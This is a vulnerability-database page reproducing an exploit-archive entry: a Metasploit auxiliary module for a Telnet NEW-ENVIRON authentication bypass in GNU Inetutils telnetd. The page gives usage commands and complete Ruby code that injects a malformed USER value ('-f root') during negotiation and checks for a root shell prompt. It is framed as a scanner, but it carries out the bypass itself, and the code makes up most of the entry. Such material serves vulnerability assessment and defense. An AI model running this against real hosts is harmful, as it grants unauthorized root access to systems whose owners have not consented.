Vulners
Lucene search
📄 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner
| Reporter | Title | Published | Views | Family All 120 |
|---|---|---|---|---|
 | Exploit for CVE-2026-24061 | 26 Jan 202605:05 | – | githubexploit |
| Exploit for CVE-2026-24061 | 26 Jan 202609:58 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 16 Mar 202614:55 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 6 Feb 202617:06 | – | githubexploit |
| Exploit for CVE-2026-24061 | 24 Jan 202613:18 | – | githubexploit |
| Exploit for CVE-2026-24061 | 24 Jan 202614:15 | – | githubexploit |
| telnet-pocs-2026 | 12 May 202609:25 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 3 Mar 202604:31 | – | githubexploit |
| Exploit for Argument Injection in Gnu Inetutils | 27 Jan 202620:04 | – | githubexploit |
| Exploit for CVE-2026-24061 | 22 Jan 202618:30 | – | githubexploit |
10
=============================================================================================================================================
| # Title : GNU Inetutils 2.7 Telnet NEW‑ENVIRON Authentication Bypass Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : System built‑in component. No standalone download available. |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214219/ & CVE-2026-24061
[+] Summary : This Metasploit auxiliary scanner detects a Telnet authentication bypass vulnerability related to improper handling of the NEW-ENVIRON option during Telnet negotiation.
The issue allows an attacker to inject a malformed USER environment variable (for example, using flags such as -f root) when the server requests environment variables.
Affected Telnet daemons may incorrectly trust this input, potentially bypassing password authentication and granting immediate shell access.
The module passively listens for the IAC SB NEW-ENVIRON SEND request, then responds with a crafted subnegotiation payload to test whether the target accepts the malicious USER value.
It verifies success by analyzing server responses for common indicators of a successful login or shell prompt. When exploitation indicators are detected,
the module reports the vulnerability in the Metasploit database.
This scanner is intended for security assessment and detection purposes against vulnerable Telnet servers, including implementations such as GNU Inetutils telnetd up to affected versions,
and aligns conceptually with historical NEW-ENVIRON authentication bypass issues (e.g., CVE-1999-0192 and related Telnet environment variable flaws).
[+] Usage :
# View available options
show options
# Set target(s)
set RHOSTS <target_IP_or_range>
# Example: set RHOSTS 192.168.1.1
# Or for a range: set RHOSTS 192.168.1.1-254
# Optional: Change port if Telnet is on non-standard port
set RPORT 2323
# Optional: Adjust timeout (default: 5 seconds)
set TIMEOUT 10
# Optional: Change payload (default: "-f root")
set USER_PAYLOAD "-f admin"
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
Rank = NormalRanking
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Telnet
def initialize(info = {})
super(update_info(info,
'Name' => 'Telnet NEW-ENVIRON Authentication Bypass Scanner',
'Description' => %q{
This module scans Telnet servers for the historical NEW-ENVIRON
authentication bypass vulnerability (CVE-1999-0192).
Vulnerable Telnet daemons may incorrectly process environment
variables supplied during NEW-ENVIRON negotiation. By injecting
a malformed USER value (e.g., "-f root"), authentication checks
may be bypassed.
This module detects and confirms the bypass condition only.
It does NOT execute commands or create a session.
},
'Author' =>
[
'indoushka'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '1999-0192'],
['RFC', '1572']
],
'DisclosureDate' => '1994-12-12'
))
register_options(
[
Opt::RPORT(23),
OptString.new(
'USER_PAYLOAD',
[
true,
'Malformed USER environment value',
'-f root'
]
),
OptInt.new(
'TIMEOUT',
[
true,
'Timeout for Telnet negotiation (seconds)',
5
]
)
]
)
end
def run_host(ip)
begin
connect
print_status("#{ip}:#{rport} - Connected to Telnet service")
self.sock.telnet_options[:negotiation] = false
new_environ_requested = false
::Timeout.timeout(datastore['TIMEOUT']) do
loop do
data = sock.get_once(-1, 1)
break if data.nil?
if data.include?("\xff\xfa\x27\x01")
new_environ_requested = true
print_good("#{ip}:#{rport} - NEW-ENVIRON request detected")
buf = "\xff\xfa\x27\x00"
buf += "\x00USER"
buf += "\x01"
buf += datastore['USER_PAYLOAD']
buf += "\xff\xf0"
print_status("#{ip}:#{rport} - Sending USER=#{datastore['USER_PAYLOAD']}")
Rex.sleep(1)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response =~ /(last login|welcome|login successful|[#\$]>)/i
print_good("#{ip}:#{rport} - AUTHENTICATION BYPASS CONFIRMED")
print_status("#{ip}:#{rport} - Server response: #{response.strip}")
report_vuln(
host: ip,
port: rport,
proto: 'tcp',
name: self.name,
refs: self.references,
info: "Authentication bypass via NEW-ENVIRON (USER=#{datastore['USER_PAYLOAD']})"
)
else
print_status("#{ip}:#{rport} - Payload sent, but bypass not confirmed")
end
break
end
end
end
unless new_environ_requested
print_error("#{ip}:#{rport} - NEW-ENVIRON was not requested (likely not vulnerable)")
end
rescue ::Timeout::Error
print_error("#{ip}:#{rport} - Timeout during Telnet negotiation")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::EOFError
print_error("#{ip}:#{rport} - Server closed the connection")
rescue ::Interrupt
raise
rescue ::Exception => e
print_error("#{ip}:#{rport} - Unexpected error: #{e.class} - #{e.message}")
ensure
disconnect
end
end
end
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jan 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 210
CVSS 3.19.8
EPSS0.91526
SSVC